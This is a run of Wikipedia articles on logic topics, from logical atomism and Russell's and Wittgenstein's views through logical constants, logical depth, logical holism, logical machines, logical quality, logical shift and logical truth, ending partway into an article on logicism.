However, logical atomism has older roots. Russell and Moore broke themselves free from British Idealism in the 1890s. And Russell's break developed along its own logical and mathematical path. His views on philosophy and its methods were heavily influenced by revolutionary nineteenth-century mathematics by figures like Cantor , Dedekind , Peano , and Weierstrass . As he says in his 1901 essay, republished in his 1917 collection Mysticism and Logic, and Other Essays under the title "Mathematics and the Metaphysicians":
What is now required is to give the greatest possible development to mathematical logic, to allow to the full the importance of relations , and then to found upon this secure basis a new philosophical logic, which may hope to borrow some of the exactitude and certainty of its mathematical foundation. If this can be successfully accomplished, there is every reason to hope that the near future will be as great an epoch in pure philosophy as the immediate past has been in the principles of mathematics. Great triumphs inspire great hopes; and pure thought may achieve, within our generation, such results as will place our time, in this respect, on a level with the greatest age of Greece. (pg. 96) [ 7 ]
With the operations of the calculus of relations as atoms or indefinables ( primitive notions ), Russell described logicism , or mathematics as logic, in The Principles of Mathematics (1903). Russell thought the revolutionary mathematical work could, through the development of relations, produce a similar revolution in philosophy. This ambition overlays the character of Russell's work from 1900 onward. Russell believes in fact that logical atomism, fully carried out and implemented throughout philosophy, is the realization of his 1901 ambition. As he says in the 1911 piece where he coins the phrase "logical atomism":
The true method, in philosophy as in science, should be inductive, meticulous, respectful of detail, and should reject the belief that it is the duty of each philosophy to solve all problems by himself. It is this method which has inspired analytic realism [a.k.a. logical atomism], and it is the only method, if I am not mistaken, with which philosophy will succeed in obtaining results as solid as those obtained in science. (pg. 139) [ 4 ]
Logical atomism rightly makes logic central to philosophy. In doing so, it makes philosophy scientific, at least in Russell's view. As he says in his 1924 "Logical Atomism": [ 8 ]
The technical methods of mathematical logic, as developed in this book [ Principia Mathematica ], seem to me very powerful, and capable of providing a new instrument for the discussion of many problems that have hitherto remained subject to philosophical vagueness.
In summary, Russell thought that a moral of the revolutionary work in mathematics was this: equally revolutionary work in philosophy could occur, if we only make logic the essence of philosophizing. [ 9 ] This aspiration lies at the origin, and motivates and runs through, logical atomism.
Russell referred to his atomistic doctrine as contrary to the tier "of the people who more or less follow Hegel" (PLA 178).
The first principle of logical atomism is that the World contains "facts". The facts are complex structures consisting of objects ("particulars"). A fact may be that an object has a property or that it stands in some relation to other objects. In addition, there are judgments ("beliefs"), which are in a relationship to the facts, and by this relationship either true or false.
According to this theory, even ordinary objects of daily life "are apparently complex entities". According to Russell, words like "this" and "that" are used to denote particulars. In contrast, ordinary names such as "Socrates" actually are definitive descriptions. In the analysis of "Plato talks with his pupils", "Plato" needs to be replaced with something like "the man who was the teacher of Aristotle".
In 1905, Russell had already criticized Alexius Meinong , whose theories led to the paradox of the simultaneous existence and non-existence of fictional objects. This theory of descriptions was crucial to logical atomism, as Russell believed that language mirrored reality.
Bertrand Russell's theory of logical atomism consists of three interworking parts: the atomic proposition, the atomic fact , and the atomic complex. An atomic proposition, also known as an elemental judgement, is a fundamental statement describing a single entity. Russell refers to this entity as an atomic fact, and recognizes a range of elements within each fact that he refers to as particulars and universals . A particular denotes a signifier such as a name, many of which may apply to a single atomic fact, while a universal lends quality to these particulars, e.g. color, shape, disposition. In Russell's Theory of Acquaintance , awareness and thereby knowledge of these particulars and universals comes through sense data . Every system consists of many atomic propositions and their corresponding atomic facts, known together as an atomic complex. In respect to the nomenclature that Russell used for his theory, these complexes are also known as molecular facts in that they possess multiple atoms. Rather than decoding the complex in a top-down manner, logical atomism analyzes its propositions individually before considering their collective effect. According to Russell, the atomic complex is a product of human thought and ideation that combines the various atomic facts in a logical manner.
Russell's perspective on belief proved a point of contention between him and Wittgenstein, causing it to shift throughout his career. In logical atomism, belief is a complex that possesses both true and untrue propositions. Initially, Russell plotted belief as the special relationship between a subject and a complex proposition. Later, he amended this to say that belief lacks a proposition, and instead associates with universals and particulars directly. Here, the link between psychological experience – sense data – and components of logical atomism – universals and particulars – causes a breach in the typical logic of the theory; Russell's logical atomism is in some respects defined by the crossover of metaphysics and analytical philosophy, which characterizes the field of naturalized epistemology . [ 10 ]
In his theory of Logical Atomism, Russell posited the highly controversial idea that for every positive fact exists a parallel negative fact: a fact that is untrue. The correspondence theory maintains that every atomic proposition coordinates with exactly one atomic fact, and that all atomic facts exist. The Theory of Acquaintance says that for any given statement taking the form of an atomic proposition, we must be familiar with the assertion it makes. For example, in the positive statement, "the leaf is green," we must be acquainted with the atomic fact that the leaf is green, and we know that this statement corresponds to exactly this one fact. Along this same line, the complementary negative statement, "the leaf is not green," is clearly false given what we know about the color of the leaf, but our ability to form a statement of this nature means that a corresponding fact must exist. Regardless of whether the second statement is or isn't true, the connection between its proposition and a fact must itself be true. One central doctrine of Logical Atomism, known as the Logically Perfect Language Principle, enables this conclusion. This principle establishes that everything exists as atomic proposition and fact, and that all language signifies reality. In Russell's viewpoint, this necessitates the negative fact, whereas Wittgenstein maintained the more conventional Principle of Bivalence , in which the states "P" and "Not (P)" cannot coexist.
In his Tractatus Logico-Philosophicus , Ludwig Wittgenstein explains his version of logical atomism as the relationship between proposition, state of affairs, object, and complex, often referred to as "Picture theory". [ 11 ] In view of Russell's version, the propositions are congruent in that they are both clear statements about an atomic entity. Every atomic proposition is constructed from "names" that correspond to "objects", and the interaction of these objects generates "states of affairs," which are analogous to what Russell called atomic facts. Where Russell identifies both particulars and universals, Wittgenstein amalgamates these into objects for the sake of protecting the truth-independence of his propositions; a self-contained state of affairs defines each proposition, and the truth of a proposition cannot be proven by the sharing or exclusion of objects between propositions. In Russell's work, his concept of universals and particulars denies truth-independence, as each universal accounts for a specific set of particulars, and the exact matching of any two sets implies equality, difference implies inequality, and this acts as a qualifier of truth. In Wittgenstein's theory, an atomic complex is a layered proposition subsuming many atomic propositions, each representing its own state of affairs.
Wittgenstein's handling of belief was dismissive and reflects his abstention from the epistemology that concerned Russell. Because his theory dealt with understanding the nature of reality, and because any item or process of the mind barring positive fact, i.e. something absolute and without interpretation, may become altered and thus divorced from reality, belief exists as a sign of reality but not reality itself. Wittgenstein was decidedly skeptical of epistemology , which tends to value unifying metaphysical ideas while depreciating the casewise and methodological inspection of philosophy that dominates his Tractatus Logico-Philosophicus. [ 12 ] Furthermore, Wittgenstein concerned himself with defining the exact correspondence between language and reality wherein any explanation of reality that defies or overburdens these semantic structures, namely metaphysics, becomes unhinged. Wittgenstein's work bears the exact philosophical determinants that he openly dismissed, hence his later abandonment of this theory altogether.
At the time Russell delivered his lectures on logical atomism, he had lost contact with Wittgenstein. After World War I , Russell met with Wittgenstein again and helped him publish the Tractatus Logico Philosophicus , Wittgenstein's own version of Logical Atomism.
Although Wittgenstein did not use the expression Logical Atomism , the book espouses most of Russell's logical atomism except for Russell's Theory of Knowledge (T 5.4 and 5.5541). By 1918 Russell had moved away from this position. Nevertheless, the Tractatus differed so fundamentally from the philosophy of Russell that Wittgenstein always believed that Russell misunderstood the work. [ citation needed ]
The differences relate to many details, but the crucial difference is in a fundamentally different understanding of the task of philosophy. Wittgenstein believed that the task of philosophy was to clean up linguistic mistakes. Russell was ultimately concerned with establishing sound epistemological foundations. Epistemological questions such as how practical knowledge is possible did not interest Wittgenstein. Wittgenstein investigated the "limits of the world" and later on meaning. For Wittgenstein, metaphysics and ethics were nonsensical - as they did not "speak of facts" - though he did not mean to devalue their importance in life by describing them in this way. [ 13 ] Russell, on the other hand, believed that these subjects, particularly ethics, though belonging not to philosophy nor science and possessing an inferior epistemological foundation, were not only of certain interest, but also meaningful.
The immediate effect of the Tractatus was enormous, particularly by the reception it received by the Vienna Circle . However, it is now claimed by many contemporary analytic philosophers , that the Vienna Circle misunderstood certain sections of the Tractatus . The indirect effect of the method, however, was perhaps even greater long-term, especially on logical positivism . Wittgenstein eventually rejected the "atomism" of logical atomism in his posthumously published book, Philosophical Investigations , and it is still debated whether or not he ever held the wide-ranging version that Russell expounded in his 1918 logical atomism lectures. [ 1 ] Russell, on the other hand, never abandoned logical atomism. In his 1959 My Philosophical Development , Russell said that his philosophy evolved and changed many times in his life, but he described all these changes as an "evolution" stemming from his original "revolution" into logical atomism in 1899-1900: [ 14 ]
There is one major division in my philosophical work: in the years 1899-1900, I adopted the philosophy of logical atomism and the technique of Peano in mathematical logic. This was so great a revolution as to make my previous work, except such as was purely mathematical, irrelevant to everything that I did later. The change in these years was a revolution; subsequent changes have been of the nature of an evolution. (Chapter 1: "Introductory Outline")
Even into the 1960s, Russell claimed that he "rather avoided labels" in describing his views—with the exception of "logical atomism." [ 15 ]
Philosophers such as Willard Van Orman Quine , Hubert Dreyfus and Richard Rorty went on to adopt logical holism . | https://en.wikipedia.org/wiki/Logical_atomism |
In logic , a logical constant or constant symbol of a language L {\displaystyle {\mathcal {L}}} is a symbol that has the same semantic value under every interpretation of L {\displaystyle {\mathcal {L}}} . Two important types of logical constants are logical connectives and quantifiers . The equality predicate (usually written '=') is also treated as a logical constant in many systems of logic .
One of the fundamental questions in the philosophy of logic is "What is a logical constant?"; [ 1 ] that is, what special feature of certain constants makes them logical in nature? [ 2 ]
Some symbols that are commonly treated as logical constants are:
Many of these logical constants are sometimes denoted by alternate symbols (for instance, the use of the symbol "&" rather than "∧" to denote the logical and ).
Defining logical constants is a major part of the work of Gottlob Frege and Bertrand Russell . Russell returned to the subject of logical constants in the preface to the second edition (1937) of The Principles of Mathematics noting that logic becomes linguistic: "If we are to say anything definite about them, [they] must be treated as part of the language, not as part of what the language speaks about." [ 3 ] The text of this book uses relations R , their converses and complements as primitive notions , also taken as logical constants in the form aRb .
This logic -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Logical_constant |
In the system of Aristotelian logic , the logical cube is a diagram representing the different ways in which each of the eight propositions of the system is logically related ('opposed') to each of the others. [ 1 ] The system is also useful in the analysis of syllogistic logic , serving to identify the allowed logical conversions from one type to another. [ 2 ]
This logic -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Logical_cube |
Logical depth is a measure of complexity for individual strings devised by Charles H. Bennett based on the computational complexity of an algorithm that can recreate a given piece of information. It differs from Kolmogorov complexity in that it considers the computation time of the algorithm with nearly minimal length, rather than the length of the minimal algorithm.
Informally, the logical depth of a string x {\displaystyle x} to a significance level s {\displaystyle s} is the time required to compute x {\displaystyle x} by a program no more than s {\displaystyle s} bits longer than the shortest program that computes x {\displaystyle x} . [ 1 ]
Formally, let p ∗ {\displaystyle p^{*}} be the shortest program that computes a string x {\displaystyle x} on some universal computer U {\displaystyle U} . Then the logical depth of x {\displaystyle x} to the significance level s {\displaystyle s} is given by min { T ( p ) : ( | p | − | p ∗ | < s ) ∧ ( U ( p ) = x ) } , {\displaystyle {\text{min}}\{T(p):(|p|-|p^{*}|<s)\wedge (U(p)=x)\},} where T ( p ) {\displaystyle T(p)} is the number of computation steps that p {\displaystyle p} made on U {\displaystyle U} to produce x {\displaystyle x} and halt.
This theoretical computer science –related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Logical_depth |
In Philosophy , logical holism is the belief that the world operates in such a way that no part can be known without the whole being known first.
Theoretical holism is a theory in philosophy of science , that a theory of science can only be understood in its entirety, introduced by Pierre Duhem . Different total theories of science are understood by making them commensurable allowing statements in one theory to be converted to sentences in another. [ 1 ] : II Richard Rorty argued that when two theories are incompatible a process of hermeneutics is necessary. [ 1 ] : II
Practical holism is a concept in the work of Martin Heidegger than posits it not possible to produce a complete understanding of one's own experience of reality because your mode of existence is embedded in cultural practices, the constraints of the task that you are doing. [ 1 ] : III
Bertrand Russell concluded that " Hegel 's dialectical logical holism should be dismissed in favour of the new logic of propositional analysis ." [ 2 ] and introduced a form of logical atomism . [ 3 ]
A unique kind of holism is found in Chinese philosophy , especially in the writings of the Tiantai school of Buddhism, beginning with the works of Zhiyi . The Buddhist studies scholar and philosopher Brook Ziporyn terms it "Omnicentric holism". [ 4 ]
This article about epistemology is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Logical_holism |
A logical machine or logical abacus is a tool containing a set of parts that uses energy to perform formal logic operations through the use of truth tables . Early logical machines were mechanical devices that performed basic operations in Boolean logic . The principal examples of such machines are those of William Stanley Jevons ( logic piano ), [ 1 ] [ 2 ] John Venn , [ 3 ] and Allan Marquand . [ 4 ] [ 5 ]
Contemporary logical machines are computer-based electronic programs that perform proof assistance with theorems in mathematical logic. In the 21st century, these proof assistant programs have given birth to a new field of study called mathematical knowledge management .
The earliest logical machines were mechanical constructs built in the late 19th century. William Stanley Jevons invented the first logical machine in 1869, the logic piano. [ 6 ] In 1883, Allan Marquand invented a new logical machine that performed the same operations as Jevons' logic piano but with improvements in design simplification, portability, and input-output controls. [ 7 ]
A logical abacus is constructed to show all the possible combinations of a set of logical terms with their negatives, and, further, the way in which these combinations are affected by the addition of attributes or other limiting words, i.e., to simplify mechanically the solution of logical problems. These instruments are all more or less elaborate developments of the "logical slate", on which were written in vertical columns all the combinations of symbols or letters which could be made logically out of a definite number of terms. These were compared with any given premises, and those which were incompatible were crossed off. In the abacus the combinations are inscribed each on a single slip of wood or similar substance, which is moved by a key; incompatible combinations can thus be mechanically removed at will, in accordance with any given series of premises.
This article incorporates text from a publication now in the public domain : Chisholm, Hugh , ed. (1911). " Abacus ". Encyclopædia Britannica . Vol. 1 (11th ed.). Cambridge University Press. pp. 5– 6.
This mathematical logic -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Logical_machine |
In many philosophies of logic , statements are categorized into different logical qualities based on how they go about saying what they say. Doctrines of logical quality are an attempt to answer the question: "How many qualitatively different ways are there of saying something?" Aristotle answers, two: you can affirm something of something or deny something of something. Since Frege , the normal answer in the West, is only one, assertion , but what is said, the content of the claim, can vary. For Frege asserting the negation of a claim serves roughly the same role as denying a claim does in Aristotle. Other Western logicians such as Kant and Hegel answer, ultimately three; you can affirm, deny or make merely limiting affirmations, which transcend both affirmation and denial. In Indian logic , four logical qualities have been the norm, and Nāgārjuna is sometimes interpreted as arguing for five.
In Aristotle 's term logic there are two logical qualities: affirmation (kataphasis) and denial (apophasis). The logical quality of a proposition is whether it is affirmative (the predicate is affirmed of the subject) or negative (the predicate is denied of the subject). Thus "every man is a mortal" is affirmative, since "mortal" is affirmed of "man". "No men are immortals" is negative, since "immortal" is denied of "man". [ 1 ]
Logical quality has become much less central to logical theory in the twentieth century. It has become common to use only one logical quality, typically called logical assertion . Much of the work previously done by distinguishing affirmation from denial is typically now done through the theory of negation . [ 2 ] Thus, to most contemporary logicians, making a denial is essentially reducible to affirming a negation. Denying that Socrates is ill, is the same thing as affirming that it is not the case that Socrates is ill, which is basically affirming that Socrates is not ill. This trend may go back to Frege although his notation for negation is ambiguous between asserting a negation and denying. [ 3 ] Gentzen 's notation definitely assimilates denial to assertion of negation, but might not quite have a single logical quality, see below.
Logicians in the western traditions have often expressed belief in some other logical quality besides affirmation and denial. Sextus Empiricus , in the 2nd or 3rd century CE, argued for the existence of "nonassertive" statements, which indicate suspension of judgment by refusing to affirm or deny anything. [ 4 ] Pseudo-Dionysius the Areopagite in the 6th century, argued for the existence of "non-privatives", which transcend both affirmation and denial. For example, it is not quite correct to affirm that God is, nor to deny that God moves, but rather one should say that God is beyond-motion, or super-motive, and this is intended not just as a special kind of affirmation or denial, but a third move besides affirmation and denial. [ 5 ]
For Kant every judgment takes one of three possible logical qualities, Affirmative, Negative or Infinite. For Kant, if I say “The soul is mortal” I have made an affirmation about the soul; I have said something contentful about it. If I say “The soul is not mortal,” I have made a negative judgment and thus “warded off error” but I have not said what the soul is instead. If, however, I say “The soul is non-mortal,” I have made an infinite judgment. For the purposes of “General logic” it is sufficient to see infinite judgments as a sub-variety of affirmative judgments, I have said something of the soul, namely that it is not mortal. But from the standpoint of “ Transcendental Logic ” it is important to distinguish the infinite from the affirmative. Although I have taken something away from the possibilities of what the soul might be like, I have not thereby said what it is or clarified the concept of the soul, there are still an infinite number of possible ways the soul could be. The content of an infinite judgment is purely limitative of our knowledge rather than ampliative of it. [ 6 ] Hegel follows Kant in insisting that, at least transcendentally, affirmation and negation are not enough but require a third logical quality sublating them both. [ 7 ]
In Indian logic it has long been traditional to claim that there are four kinds of claims. You can affirm that X is so, you can deny that X is so, you can neither-affirm-nor-deny that X is so, or you can both-affirm-and-deny that X is so. Each claim can also take one of four truth-values true, false, neither-true-nor-false, and both-true-and-false. However the tradition is clear that the four kinds of statements are distinct from the four values of statements. [ 8 ] Nāgārjuna is sometimes interpreted as teaching that there is a fifth logical quality besides the four typical of Indian logic, but there are disputing interpretations. [ 9 ]
Although the distinction between affirmation and denial is rarely supported today, you might try to argue that some other distinctions in the structure of assertion could be thought of as differences of logical quality. One might argue, for instance, that the distinction between sequents with empty and non-empty antecedents amounts to a distinction between logical consequences and logical assertions . Alternately one might claim that both forms are really just logical assertions in the metalanguage , and are not statements at all in the object language, since the turnstile isn't in the object language. Similarly you might argue that a modern language that includes both an assertion mechanism, and a "retraction" mechanism (such as Diderik Batens ' "Adaptive Logics") [ 10 ] could be thought of as having two logical qualities "assertion" and "retraction." | https://en.wikipedia.org/wiki/Logical_quality |
In computer science , a logical shift is a bitwise operation that shifts all the bits of its operand. The two base variants are the logical left shift and the logical right shift . This is further modulated by the number of bit positions a given value shall be shifted, such as shift left by 1 or shift right by n . Unlike an arithmetic shift , a logical shift does not preserve a number's sign bit or distinguish a number's exponent from its significand (mantissa); every bit in the operand is simply moved a given number of bit positions, and the vacant bit-positions are filled, usually with zeros, and possibly ones (contrast with a circular shift ).
A logical shift is often used when its operand is being treated as a sequence of bits instead of as a number.
Logical shifts can be useful as efficient ways to perform multiplication or division of unsigned integers by powers of two. Shifting left by n bits on a signed or unsigned binary number has the effect of multiplying it by 2 n . Shifting right by n bits on an unsigned binary number has the effect of dividing it by 2 n (rounding towards 0).
Logical right shift differs from arithmetic right shift. Thus, many languages have different operators for them. For example, in Java and JavaScript , the logical right shift operator is >>> , but the arithmetic right shift operator is >> . (Java has only one left shift operator ( << ), because left shift via logic and arithmetic have the same effect.)
The programming languages C , C++ , and Go , however, have only one right shift operator, >> . Most C and C++ implementations, and Go, choose which right shift to perform depending on the type of integer being shifted: signed integers are shifted using the arithmetic shift, and unsigned integers are shifted using the logical shift. In particular, C++ uses its logical shift operators as part of the syntax of its input and output functions, called "cin" and "cout" respectively.
All currently relevant C standards (ISO/IEC 9899:1999 to 2011) leave a definition gap for cases where the number of shifts is equal to or bigger than the number of bits in the operands in a way that the result is undefined. This helps allow C compilers to emit efficient code for various platforms by allowing direct use of the native shift instructions which have differing behavior. For example, shift-left-word in PowerPC chooses the more-intuitive behavior where shifting by the bit width or above gives zero, [ 6 ] whereas SHL in x86 chooses to mask the shift amount to the lower bits to reduce the maximum execution time of the instructions , and as such a shift by the bit width doesn't change the value. [ 7 ]
Some languages, such as the .NET Framework and LLVM , also leave shifting by the bit width and above unspecified (.NET) [ 8 ] or undefined (LLVM). [ 9 ] Others choose to specify the behavior of their most common target platforms, such as C# which specifies the x86 behavior. [ 10 ]
If the bit sequence 0001 0111 (decimal 23) is logically shifted by one bit position, then:
Note: MSB = Most Significant Bit,
LSB = Least Significant Bit | https://en.wikipedia.org/wiki/Logical_shift |
Logical truth is one of the most fundamental concepts in logic . Broadly speaking, a logical truth is a statement which is true regardless of the truth or falsity of its constituent propositions . In other words, a logical truth is a statement which is not only true, but one which is true under all interpretations of its logical components (other than its logical constants ). Thus, logical truths such as "if p, then p" can be considered tautologies . Logical truths are thought to be the simplest case of statements which are analytically true (or in other words, true by definition). All of philosophical logic can be thought of as providing accounts of the nature of logical truth, as well as logical consequence . [ 1 ]
Logical truths are generally considered to be necessarily true . This is to say that they are such that no situation could arise in which they could fail to be true. The view that logical statements are necessarily true is sometimes treated as equivalent to saying that logical truths are true in all possible worlds . However, the question of which statements are necessarily true remains the subject of continued debate.
Treating logical truths, analytic truths, and necessary truths as equivalent, logical truths can be contrasted with facts (which can also be called contingent claims or synthetic claims ). Contingent truths are true in this world, but could have turned out otherwise (in other words, they are false in at least one possible world). Logically true propositions such as "If p and q, then p" and "All married people are married" are logical truths because they are true due to their internal structure and not because of any facts of the world (whereas "All married people are happy", even if it were true, could not be true solely in virtue of its logical structure).
Rationalist philosophers have suggested that the existence of logical truths cannot be explained by empiricism , because they hold that it is impossible to account for our knowledge of logical truths on empiricist grounds. Empiricists commonly respond to this objection by arguing that logical truths (which they usually deem to be mere tautologies), are analytic and thus do not purport to describe the world. The latter view was notably defended by the logical positivists in the early 20th century.
Logical truths, being analytic statements, do not contain any information about any matters of fact . Other than logical truths, there is also a second class of analytic statements, typified by "no bachelor is married". The characteristic of such a statement is that it can be turned into a logical truth by substituting synonyms for synonyms salva veritate . "No bachelor is married" can be turned into "no unmarried man is married" by substituting "unmarried man" for its synonym "bachelor". [ citation needed ]
In his essay Two Dogmas of Empiricism , the philosopher W. V. O. Quine called into question the distinction between analytic and synthetic statements. It was this second class of analytic statements that caused him to note that the concept of analyticity itself stands in need of clarification, because it seems to depend on the concept of synonymy , which stands in need of clarification. In his conclusion, Quine rejects that logical truths are necessary truths. Instead he posits that the truth-value of any statement can be changed, including logical truths, given a re-evaluation of the truth-values of every other statement in one's complete theory. [ citation needed ]
Considering different interpretations of the same statement leads to the notion of truth value . The simplest approach to truth values means that the statement may be "true" in one case, but "false" in another. In one sense of the term tautology , it is any type of formula or proposition which turns out to be true under any possible interpretation of its terms (may also be called a valuation or assignment depending upon the context). This is synonymous to logical truth. [ citation needed ]
However, the term tautology is also commonly used to refer to what could more specifically be called truth-functional tautologies. Whereas a tautology or logical truth is true solely because of the logical terms it contains in general (e.g. " every ", " some ", and "is"), a truth-functional tautology is true because of the logical terms it contains which are logical connectives (e.g. " or ", " and ", and " nor "). Not all logical truths are tautologies of such a kind. [ citation needed ]
Logical constants, including logical connectives and quantifiers , can all be reduced conceptually to logical truth. For instance, two statements or more are logically incompatible if, and only if their conjunction is logically false. One statement logically implies another when it is logically incompatible with the negation of the other. A statement is logically true if, and only if its opposite is logically false. The opposite statements must contradict one another. In this way all logical connectives can be expressed in terms of preserving logical truth. The logical form of a sentence is determined by its semantic or syntactic structure and by the placement of logical constants. Logical constants determine whether a statement is a logical truth when they are combined with a language that limits its meaning. Therefore, until it is determined how to make a distinction between all logical constants regardless of their language, it is impossible to know the complete truth of a statement or argument. [ 2 ]
The concept of logical truth is closely connected to the concept of a rule of inference . [ 3 ]
Logical positivism was a movement in the early 20th century that tried to reduce the reasoning processes of science to pure logic. Among other things, the logical positivists claimed that any proposition that is not empirically verifiable is neither true nor false, but nonsense . [ citation needed ]
Non-classical logic is the name given to formal systems which differ in a significant way from standard logical systems such as propositional and predicate logic . There are several ways in which this is done, including by way of extensions, deviations, and variations. The aim of these departures is to make it possible to construct different models of logical consequence and logical truth. [ 4 ] | https://en.wikipedia.org/wiki/Logical_truth |
In the philosophy of mathematics , logicism is a programme comprising one or more of the theses that – for some coherent meaning of ' logic ' – mathematics is an extension of logic, some or all of mathematics is reducible to logic, or some or all of mathematics may be modelled in logic. [ 1 ] Bertrand Russell and Alfred North Whitehead championed this programme, initiated by Gottlob Frege and subsequently developed by Richard Dedekind and Giuseppe Peano .
Dedekind's path to logicism had a turning point when he was able to construct a model satisfying the axioms characterizing the real numbers using certain sets of rational numbers . This and related ideas convinced him that arithmetic , algebra and analysis were reducible to the natural numbers plus a "logic" of classes. Furthermore by 1872 he had concluded that the naturals themselves were reducible to sets and mappings . It is likely that other logicists, most importantly Frege, were also guided by the new theories of the real numbers published in the year 1872.
The philosophical impetus behind Frege's logicist programme from the Grundlagen der Arithmetik onwards was in part his dissatisfaction with the epistemological and ontological commitments of then-extant accounts of the natural numbers, and his conviction that Kant 's use of truths about the natural numbers as examples of synthetic a priori truth was incorrect.
This started a period of expansion for logicism, with Dedekind and Frege as its main exponents. However, this initial phase of the logicist programme was brought into crisis with the discovery of the classical paradoxes of set theory ( Cantor's 1896, Zermelo and Russell's 1900–1901). Frege gave up on the project after Russell recognized and communicated his paradox identifying an inconsistency in Frege's system set out in the Grundgesetze der Arithmetik. Note that naive set theory also suffers from this difficulty.
On the other hand, Russell wrote The Principles of Mathematics in 1903 using the paradox and developments of Giuseppe Peano 's school of geometry . Since he treated the subject of primitive notions in geometry and set theory
as well as the calculus of relations , this text is a watershed in the development of logicism. Evidence of the assertion of logicism was collected by Russell and Whitehead in their Principia Mathematica . [ 2 ]
Today, the bulk of extant mathematics is believed to be derivable logically from a small number of extralogical axioms, such as the axioms of Zermelo–Fraenkel set theory (or its extension ZFC ), from which no inconsistencies have as yet been derived. Thus, elements of the logicist programmes have proved viable, but in the process theories of classes, sets and mappings, and higher-order logics other than with Henkin semantics have come to be regarded as extralogical in nature, in part under the influence of Quine 's later thought.
Kurt Gödel 's incompleteness theorems show that no formal system from which the Peano axioms for the natural numbers may be derived – such as Russell's systems in PM – can decide all the well-formed sentences of that system. [ 3 ] This result damaged David Hilbert 's programme for foundations of mathematics whereby 'infinitary' theories – such as that of PM – were to be proved consistent from finitary theories, with the aim that those uneasy about 'infinitary methods' could be reassured that their use should provably not result in the derivation of a contradiction . Gödel's result suggests that in order to maintain a logicist position, while still retaining as much as possible of classical mathematics, one must accept some axiom of infinity as part of logic. On the face of it, this damages the logicist programme also, albeit only for those already doubtful concerning 'infinitary methods'. Nonetheless, positions deriving from both logicism and from Hilbertian finitism have continued to be propounded since the publication of Gödel's result.
One argument that programmes derived from logicism remain valid might be that the incompleteness theorems are ' proved with logic just like any other theorems '. However, that argument appears not to acknowledge the distinction between theorems of first-order logic and theorems of higher-order logic . The former can be proven using finistic methods, while the latter – in general – cannot. Tarski's undefinability theorem shows that Gödel numbering can be used to prove syntactical constructs, but not semantic assertions. Therefore, the claim that logicism remains a valid programme may commit one to holding that a system of proof based on the existence and properties of the natural numbers is less convincing than one based on some particular formal system. [ 4 ]
Logicism – especially through the influence of Frege on Russell and Wittgenstein [ 5 ] and later Dummett – was a significant contributor to the development of analytic philosophy during the twentieth century.
Ivor Grattan-Guinness states that the French word 'Logistique' was "introduced by Couturat and others at the 1904 International Congress of Philosophy , and was used by Russell and others from then on, in versions appropriate for various languages." (G-G 2000:501).
Apparently the first (and only) usage by Russell appeared in his 1919: "Russell referred several time [sic] to Frege, introducing him as one 'who first succeeded in "logicising" mathematics' (p. 7). Apart from the misrepresentation (which Russell partly rectified by explaining his own view of the role of arithmetic in mathematics), the passage is notable for the word which he put in quotation marks, but their presence suggests nervousness, and he never used the word again, so that 'logicism' did not emerge until the later 1920s" (G-G 2002:434). [ 6 ]
About the same time as Rudolf Carnap (1929), but apparently independently, Fraenkel (1928) used the word: "Without comment he used the name 'logicism' to characterise the Whitehead/Russell position (in the title of the section on p. 244, explanation on p. 263)" (G-G 2002:269). Carnap used a slightly different word 'Logistik'; Behmann complained about its use in Carnap's manuscript so Carnap proposed the word 'Logizismus', but he finally stuck to his word-choice 'Logistik' (G-G 2002:501). Ultimately "the spread was mainly due to Carnap, from 1930 onwards." (G-G 2000:502).
The overt intent of logicism is to derive all of mathematics from symbolic logic (Frege, Dedekind, Peano, Russell.) As contrasted with algebraic logic ( Boolean logic ) that employs arithmetic concepts, symbolic logic begins with a very reduced set of marks (non-arithmetic symbols), a few "logical" axioms that embody the "laws of thought", and rules of inference that dictate how the marks are to be assembled and manipulated – for instance substitution and modus ponens (i.e. from [1] A materially implies B and [2] A , one may derive B ). Logicism also adopts from Frege's groundwork the reduction of natural language statements from "subject|predicate" into either propositional "atoms" or the "argument|function" of "generalization"—the notions " all ", " some ", "class" (collection, aggregate) and "relation".
In a logicist derivation of the natural numbers and their properties, no "intuition" of number should "sneak in" either as an axiom or by accident. The goal is to derive all of mathematics, starting with the counting numbers and then the real numbers, from some chosen "laws of thought" alone, without any tacit assumptions of "before" and "after" or "less" and "more" or to the point: "successor" and "predecessor". Gödel 1944 summarized Russell's logicistic "constructions", when compared to "constructions" in the foundational systems of Intuitionism and Formalism ("the Hilbert School") as follows: "Both of these schools base their constructions on a mathematical intuition whose avoidance is exactly one of the principal aims of Russell's constructivism " (Gödel 1944 in Collected Works 1990:119).
Gödel 1944 summarized the historical background from Leibniz 's in Characteristica universalis , through Frege and Peano to Russell: "Frege was chiefly interested in the analysis of thought and used his calculus in the first place for deriving arithmetic from pure logic", whereas Peano "was more interested in its applications within mathematics". But "It was only [Russell's] Principia Mathematica that full use was made of the new method for actually deriving large parts of mathematics from a very few logical concepts and axioms. In addition, the young science was enriched by a new instrument, the abstract theory of relations" (p. 120-121).
Kleene 1952 states it this way: "Leibniz (1666) first conceived of logic as a science containing the ideas and principles underlying all other sciences. Dedekind (1888) and Frege (1884, 1893, 1903) were engaged in defining mathematical notions in terms of logical ones, and Peano (1889, 1894–1908) in expressing mathematical theorems in a logical symbolism" (p. 43); in the previous paragraph he includes Russell and Whitehead as exemplars of the "logicistic school", the other two "foundational" schools being the intuitionistic and the "formalistic or axiomatic school" (p. 43).
Frege 1879 describes his intent in the Preface to his 1879 Begriffsschrift : He started with a consideration of arithmetic: did it derive from "logic" or from "facts of experience"?
Dedekind 1887 describes his intent in the 1887 Preface to the First Edition of his The Nature and Meaning of Numbers . He believed that in the "foundations of the simplest science; viz., that part of logic which deals with the theory of numbers" had not been properly argued – "nothing capable of proof ought to be accepted without proof":
Peano 1889 states his intent in his Preface to his 1889 Principles of Arithmetic :
Russell 1903 describes his intent in the Preface to his 1903 Principles of Mathematics :
The epistemologies of Dedekind and of Frege seem less well-defined than that of Russell, but both seem accepting as a priori the customary "laws of thought" concerning simple propositional statements (usually of belief); these laws would be sufficient in themselves if augmented with theory of classes and relations (e.g. x R y ) between individuals x and y linked by the generalization R.
